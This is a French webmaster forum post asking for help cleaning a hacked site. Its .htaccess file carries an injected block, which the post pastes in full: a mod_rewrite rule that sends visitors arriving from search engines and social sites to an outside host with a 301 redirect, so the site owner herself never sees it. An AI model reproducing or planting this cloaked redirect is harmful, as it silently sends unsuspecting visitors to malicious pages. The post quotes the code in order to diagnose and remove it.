Bonsoir à tous,

"page malveillante, le retour !", enfin presque, mon souci est un peu différent cette fois-ci. Aucun problème de mon côté, un de mes clients m'envoie une capture de mon site sous Google Chrome avec un message d'alerte "le site web que vous allez ouvrir contient une page malveillante". J'essaie de mon côté sur IE, Firefox et Google Chrome, pas de problème, bon.

Par contre, dans mon Google Outils pour webmaster, j'ai bien un message d'alerte me disant que certaines pages ont été infectés par une injection de code dans le .htaccess

J'ouvre le .htaccess, je compare avec les éléments que mon client m'a donné et effectivement, je trouve qu'on m'a injecté une redirection vers le site http://boldcraft.cba.pl[....]

Seulement, je ne suis pas sûre de ce que je dois exactement retirer de mon .htaccess (sachant que je ne verrai pas la différence puisque chez moi, je n'ai pas de problème d'affichage).

Voici la portion de code, pouvez-vous me donner votre avis ? Merci !

Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://boldcraft.cba.pl/infusions/traf.php [R=301,L]
</IfModule>

#/336988#
#
Stéphanie de www.franchise-land.com